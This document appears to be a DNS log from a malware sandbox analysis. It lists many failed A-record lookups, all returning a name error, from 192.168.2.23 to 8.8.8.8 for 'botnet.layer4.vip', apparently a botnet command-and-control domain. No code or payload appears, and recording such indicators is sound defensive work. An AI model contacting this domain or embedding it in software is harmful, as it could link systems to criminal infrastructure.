                                  Apr 9, 2023 03:31:23.307620049 CEST8.8.8.8192.168.2.230x5090Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.332123041 CEST8.8.8.8192.168.2.230x5090Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.356833935 CEST8.8.8.8192.168.2.230x5090Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.372987986 CEST8.8.8.8192.168.2.230xf6c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.412627935 CEST8.8.8.8192.168.2.230xf6c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.428153038 CEST8.8.8.8192.168.2.230xf6c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.475750923 CEST8.8.8.8192.168.2.230xa0ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.491374969 CEST8.8.8.8192.168.2.230xa0ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.515911102 CEST8.8.8.8192.168.2.230xa0ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.540188074 CEST8.8.8.8192.168.2.230xa0ecName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.556003094 CEST8.8.8.8192.168.2.230x2aa6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.612222910 CEST8.8.8.8192.168.2.230x2aa6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.627984047 CEST8.8.8.8192.168.2.230x2aa6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.652343988 CEST8.8.8.8192.168.2.230x7994Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.692554951 CEST8.8.8.8192.168.2.230x7994Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.717175961 CEST8.8.8.8192.168.2.230x7994Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.789211988 CEST8.8.8.8192.168.2.230x3664Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.804766893 CEST8.8.8.8192.168.2.230x3664Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.820417881 CEST8.8.8.8192.168.2.230x3664Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.844959974 CEST8.8.8.8192.168.2.230xbcabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.908804893 CEST8.8.8.8192.168.2.230xbcabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.924415112 CEST8.8.8.8192.168.2.230xbcabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.964920044 CEST8.8.8.8192.168.2.230x3b43Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.038115978 CEST8.8.8.8192.168.2.230x3b43Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.062552929 CEST8.8.8.8192.168.2.230xa108Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.111037016 CEST8.8.8.8192.168.2.230xa108Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.153280020 CEST8.8.8.8192.168.2.230xa108Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.168904066 CEST8.8.8.8192.168.2.230x81cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.232881069 CEST8.8.8.8192.168.2.230x81cbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.273035049 CEST8.8.8.8192.168.2.230xd098Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.337745905 CEST8.8.8.8192.168.2.230xd098Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.353558064 CEST8.8.8.8192.168.2.230xd098Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.426444054 CEST8.8.8.8192.168.2.230xe1caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.522722006 CEST8.8.8.8192.168.2.230x882dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.538551092 CEST8.8.8.8192.168.2.230x882dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.554145098 CEST8.8.8.8192.168.2.230x882dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.585239887 CEST8.8.8.8192.168.2.230x6742Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.600862980 CEST8.8.8.8192.168.2.230x6742Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.721138000 CEST8.8.8.8192.168.2.230x7038Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.760931015 CEST8.8.8.8192.168.2.230x70c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.785114050 CEST8.8.8.8192.168.2.230x70c3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.856009007 CEST8.8.8.8192.168.2.230x9289Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.919888020 CEST8.8.8.8192.168.2.230x9289Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.953109980 CEST8.8.8.8192.168.2.230x739eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.969607115 CEST8.8.8.8192.168.2.230x739eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:24.993834972 CEST8.8.8.8192.168.2.230x739eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.018466949 CEST8.8.8.8192.168.2.230x739eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.123770952 CEST8.8.8.8192.168.2.230xabbfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.179562092 CEST8.8.8.8192.168.2.230xfb23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.195156097 CEST8.8.8.8192.168.2.230xfb23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.244256973 CEST8.8.8.8192.168.2.230xfb23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.269316912 CEST8.8.8.8192.168.2.230xe123Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.285284996 CEST8.8.8.8192.168.2.230xe123Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.366399050 CEST8.8.8.8192.168.2.230xe9a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.390600920 CEST8.8.8.8192.168.2.230xe9a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.414859056 CEST8.8.8.8192.168.2.230xe9a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.430830956 CEST8.8.8.8192.168.2.230xe9a1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.527601004 CEST8.8.8.8192.168.2.230x820cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.543668032 CEST8.8.8.8192.168.2.230x820cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.568059921 CEST8.8.8.8192.168.2.230xdc8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.607959032 CEST8.8.8.8192.168.2.230xdc8eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.673166037 CEST8.8.8.8192.168.2.230xaf61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.697840929 CEST8.8.8.8192.168.2.230xaf61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.713773966 CEST8.8.8.8192.168.2.230xaf61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.738384962 CEST8.8.8.8192.168.2.230xaf61Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.778937101 CEST8.8.8.8192.168.2.230x4be7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.819408894 CEST8.8.8.8192.168.2.230x4be7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.859379053 CEST8.8.8.8192.168.2.230x4be7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.923459053 CEST8.8.8.8192.168.2.230xf509Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:25.971786022 CEST8.8.8.8192.168.2.230xf509Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.070178986 CEST8.8.8.8192.168.2.230x68dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.094353914 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.109886885 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.174366951 CEST8.8.8.8192.168.2.230x79b0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.214880943 CEST8.8.8.8192.168.2.230xc2f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.385459900 CEST8.8.8.8192.168.2.230x25a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.434576035 CEST8.8.8.8192.168.2.230x42f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.539764881 CEST8.8.8.8192.168.2.230xa67eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.629504919 CEST8.8.8.8192.168.2.230x7d3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.669945955 CEST8.8.8.8192.168.2.230x7d3fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.751157045 CEST8.8.8.8192.168.2.230xc4b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.775490999 CEST8.8.8.8192.168.2.230xc4b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.799643993 CEST8.8.8.8192.168.2.230xc4b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.823925018 CEST8.8.8.8192.168.2.230xc4b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.929053068 CEST8.8.8.8192.168.2.230xc558Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.953795910 CEST8.8.8.8192.168.2.230xc482Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:26.985496044 CEST8.8.8.8192.168.2.230xc482Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.073282957 CEST8.8.8.8192.168.2.230x5973Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.113734007 CEST8.8.8.8192.168.2.230x5973Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.153937101 CEST8.8.8.8192.168.2.230x1364Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.169877052 CEST8.8.8.8192.168.2.230x1364Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.225905895 CEST8.8.8.8192.168.2.230xbf00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.250423908 CEST8.8.8.8192.168.2.230xbf00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.299350977 CEST8.8.8.8192.168.2.230xbf00Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.340655088 CEST8.8.8.8192.168.2.230x52cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.364964008 CEST8.8.8.8192.168.2.230x52cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.389162064 CEST8.8.8.8192.168.2.230x52cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.405249119 CEST8.8.8.8192.168.2.230x52cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.437715054 CEST8.8.8.8192.168.2.230x678fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.494525909 CEST8.8.8.8192.168.2.230x678fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.510431051 CEST8.8.8.8192.168.2.230x678fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.615969896 CEST8.8.8.8192.168.2.230x29f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.656552076 CEST8.8.8.8192.168.2.230x867eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.745822906 CEST8.8.8.8192.168.2.230x72d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.761583090 CEST8.8.8.8192.168.2.230x72d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.785873890 CEST8.8.8.8192.168.2.230x72d8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.842035055 CEST8.8.8.8192.168.2.230x9c80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.891093969 CEST8.8.8.8192.168.2.230x9c80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.931138039 CEST8.8.8.8192.168.2.230x9c80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:27.995712996 CEST8.8.8.8192.168.2.230x6e11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.027688980 CEST8.8.8.8192.168.2.230x6e11Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.043859005 CEST8.8.8.8192.168.2.230xe91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.100629091 CEST8.8.8.8192.168.2.230xe91aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.166332006 CEST8.8.8.8192.168.2.230x705aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.191158056 CEST8.8.8.8192.168.2.230x705aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.247992992 CEST8.8.8.8192.168.2.230x773aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.297425032 CEST8.8.8.8192.168.2.230x773aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.354315996 CEST8.8.8.8192.168.2.230xccbdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.410938978 CEST8.8.8.8192.168.2.230xccbdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.426958084 CEST8.8.8.8192.168.2.230xccbdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.451302052 CEST8.8.8.8192.168.2.230xff34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.466886997 CEST8.8.8.8192.168.2.230xff34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.491343021 CEST8.8.8.8192.168.2.230xff34Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.556021929 CEST8.8.8.8192.168.2.230x19fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.580291033 CEST8.8.8.8192.168.2.230x19fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.628967047 CEST8.8.8.8192.168.2.230x19fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.669069052 CEST8.8.8.8192.168.2.230xd587Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.684823990 CEST8.8.8.8192.168.2.230xd587Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.700767040 CEST8.8.8.8192.168.2.230xd587Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.725477934 CEST8.8.8.8192.168.2.230xd587Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.749986887 CEST8.8.8.8192.168.2.230xd587Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.774426937 CEST8.8.8.8192.168.2.230xad32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.798443079 CEST8.8.8.8192.168.2.230xad32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.822547913 CEST8.8.8.8192.168.2.230xad32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.846981049 CEST8.8.8.8192.168.2.230xad32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.871371984 CEST8.8.8.8192.168.2.230xad32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.887223959 CEST8.8.8.8192.168.2.230x4b05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.951003075 CEST8.8.8.8192.168.2.230x4b05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:28.991425991 CEST8.8.8.8192.168.2.230x81b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.064032078 CEST8.8.8.8192.168.2.230x81b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.095861912 CEST8.8.8.8192.168.2.230xa4bcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.175560951 CEST8.8.8.8192.168.2.230xa4bcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.215919971 CEST8.8.8.8192.168.2.230xd6afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.240380049 CEST8.8.8.8192.168.2.230xd6afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.255997896 CEST8.8.8.8192.168.2.230xd6afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.280031919 CEST8.8.8.8192.168.2.230xd6afName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.305017948 CEST8.8.8.8192.168.2.230x885fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.416778088 CEST8.8.8.8192.168.2.230x8dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.465327024 CEST8.8.8.8192.168.2.230x8dfbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.559030056 CEST8.8.8.8192.168.2.230x9974Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.583111048 CEST8.8.8.8192.168.2.230x3201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.607237101 CEST8.8.8.8192.168.2.230x3201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.631755114 CEST8.8.8.8192.168.2.230x3201Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.784573078 CEST8.8.8.8192.168.2.230xf923Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.824348927 CEST8.8.8.8192.168.2.230x1521Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.888799906 CEST8.8.8.8192.168.2.230x1521Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.913193941 CEST8.8.8.8192.168.2.230x17ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.929276943 CEST8.8.8.8192.168.2.230x17ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:29.978523970 CEST8.8.8.8192.168.2.230x17ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.027635098 CEST8.8.8.8192.168.2.230xb271Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.051939964 CEST8.8.8.8192.168.2.230xb271Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.076267958 CEST8.8.8.8192.168.2.230xb271Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.116791964 CEST8.8.8.8192.168.2.230xb271Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.141141891 CEST8.8.8.8192.168.2.230x528eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.261821032 CEST8.8.8.8192.168.2.230xf317Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.375031948 CEST8.8.8.8192.168.2.230xd361Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.406610966 CEST8.8.8.8192.168.2.230xd361Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.431132078 CEST8.8.8.8192.168.2.230xd361Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.446983099 CEST8.8.8.8192.168.2.230x456eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.495647907 CEST8.8.8.8192.168.2.230x456eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.511259079 CEST8.8.8.8192.168.2.230x456eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.535464048 CEST8.8.8.8192.168.2.230x456eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.600264072 CEST8.8.8.8192.168.2.230x28fcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.616410971 CEST8.8.8.8192.168.2.230x28fcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.672136068 CEST8.8.8.8192.168.2.230xfc69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.687695026 CEST8.8.8.8192.168.2.230xfc69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.703425884 CEST8.8.8.8192.168.2.230xfc69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.798418045 CEST8.8.8.8192.168.2.230x46d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.814333916 CEST8.8.8.8192.168.2.230x46d2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.854449034 CEST8.8.8.8192.168.2.230xa1ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.870042086 CEST8.8.8.8192.168.2.230xa1ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:30.918747902 CEST8.8.8.8192.168.2.230xa1ceName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.047364950 CEST8.8.8.8192.168.2.230xa1daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.078447104 CEST8.8.8.8192.168.2.230xa59dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.102402925 CEST8.8.8.8192.168.2.230xa59dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.166868925 CEST8.8.8.8192.168.2.230x36b1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
